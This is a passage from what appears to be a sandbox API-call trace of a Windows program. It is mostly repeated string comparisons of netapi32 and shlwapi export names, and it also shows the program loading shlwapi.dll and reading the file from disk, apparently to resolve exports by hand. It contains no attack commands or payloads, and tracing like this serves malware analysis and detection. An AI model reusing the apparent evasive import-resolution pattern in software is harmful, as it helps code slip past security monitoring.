(lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0107.972] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0107.973] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0107.973] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0107.974] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0107.975] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0108.274] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0108.275] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0108.276] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0108.277] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0108.278] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0108.278] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0108.279] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0108.279] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0108.279] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0108.279] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0108.279] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0108.283] GetProcessHeap () returned 0x430000 [0108.283] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x430000) returned 1 [0108.283] GetProcessHeap () returned 0x430000 [0108.283] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4492c0 [0108.283] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0108.283] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0108.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0108.284] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0108.284] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0108.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0108.284] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0108.284] GetProcessHeap () returned 0x430000 [0108.284] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x51148) returned 0x2d55030 [0108.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0108.285] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0108.287] CloseHandle (hObject=0x17c) returned 1 [0108.287] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0108.287] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0108.287] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0108.287] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0108.288] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0108.288] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0108.288] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0108.288] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0108.288] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0108.288] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0108.289] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0108.289] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0108.290] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0108.290] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0108.290] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 